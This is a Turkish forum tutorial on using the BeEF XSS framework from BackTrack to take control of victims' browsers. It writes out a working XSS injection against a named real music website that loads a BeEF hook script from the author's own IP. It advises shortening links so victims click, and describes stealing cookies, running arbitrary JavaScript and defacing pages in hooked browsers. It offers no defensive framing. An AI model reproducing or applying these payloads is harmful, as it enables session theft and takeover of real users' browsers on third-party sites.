Selamun Aleyküm arkadaşlar.
Uzun bir süredir anlatım yapmıyorum.Aktiflik sıkıntısı yaşıyordum.Vakit buldum ve bu anlatımı yapmak istedim.
Sizlere BeEF uygulamasından bahsedeceğim.BeEF kişinin tarayıcısını kontrol altına almanızı sağlayan içinde fazla özelliği bulunan bir uygulamadır.Nasıl yediririr derseniz onuda bir aşağılarda anlatıcam.Windows ve backtrack üzerinde kullanılabilir.Backtrackta zaten default olarak gelmektedir.Ben BT üzerinden göstereceğim.Benimde sevdiğim güzel bir yöntemdir.
Bt tarafında BeEF kısmında ulaşmak için
BackTrack - Exploitation Tools - Social Engineering Tools - BeEF XSS Framework - beef
Yolunu izliyoruz :)
Karşınıza bu tip html içerisinde bazı kodlar gelecektir.Bunlar siteye gömmek isterseniz diye javascript kodlarıdır.Ben xss üzerinden anlatıma devam edeceğim.
İlk olarak arada bir adres göreceksiniz
http://192.168.87.129/beef/ girdiğiniz zaman karşınıza direk beef ekranı gelecektir zaten.
Apply config diyoruz.
Edit 'pw.php' in BeEF root to alter the password
yazıyor yan tarafta.
pw.php dosyasından şifreye bakarsak default olarak BeEFConfigPass girilmiştir.Apply sonrasında finish'e tıklıyoruz.Moduller vs geliyor.
Şimdi xss kısmında kullanacağımız kodu görmek için
http://192.168.87.129/beef/hook/example.php linkine bakıyoruz.
<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>
kodu geldi.Bunu xss olan bir sitede kullanacağız.Örnek şuan benim elimde TTnet müzik bulunmakta.Bu linki kolayca yedirebiliriz.Kodları xss olan kısma yerleştiriyoruz.
www.ttnetmuzik.com.tr/#arama-<script>alert(document.domain)</script>
http://www.ttnetmuzik.com.tr/#arama-<script language='Javascript' src="http://192.168.87.129/beef/hook/beefmagic.js.php'></script>
Bunu tıklanma kısmı kalıyor.Bazen linkler çok uzun geliyor insanlar tıklamadan önce düşünüyor bu gibi durumlarda linkleri kısaltmak için siteler mevcut.Karşı taraf linke tıkladığı zaman zombies kısmında görünecektir..
Örnek karşı tarayıcıdaki kişiye bir mesaj göndermek istiyoruz.O zaman zombies kısmındaki ip adresine bir kere tıklıyoruz seçili hale getiriyoruz ardından standart modul kısmında alert dialog kısmını seçiyoruz.Mesajı yazıyoruz ve send now diyoruz.Ben sanal pc backtrack üzerinden windows'a uyguluyorum bunları...
Standart modul kısmında en alt kısımda raw javascript görmektesiniz.Buda kurbanda javascript kodlarını çalıştırmanıza olanak sağlar.Böylece cookie bilgilerini çekebilirsiniz.gene standart kısmında deface web page ile sayfayı komple değiştirip kendi yazınızı koyabilirsiniz.
Daha bir çok özellik bulunmaktadır.Ben temel şeylerden ve nasıl yapılacağından bahsettim.Biraz kurcalama ile bu işi kolayca başarabilirsiniz.
Hem zaman derim XSS'de iş var ^^
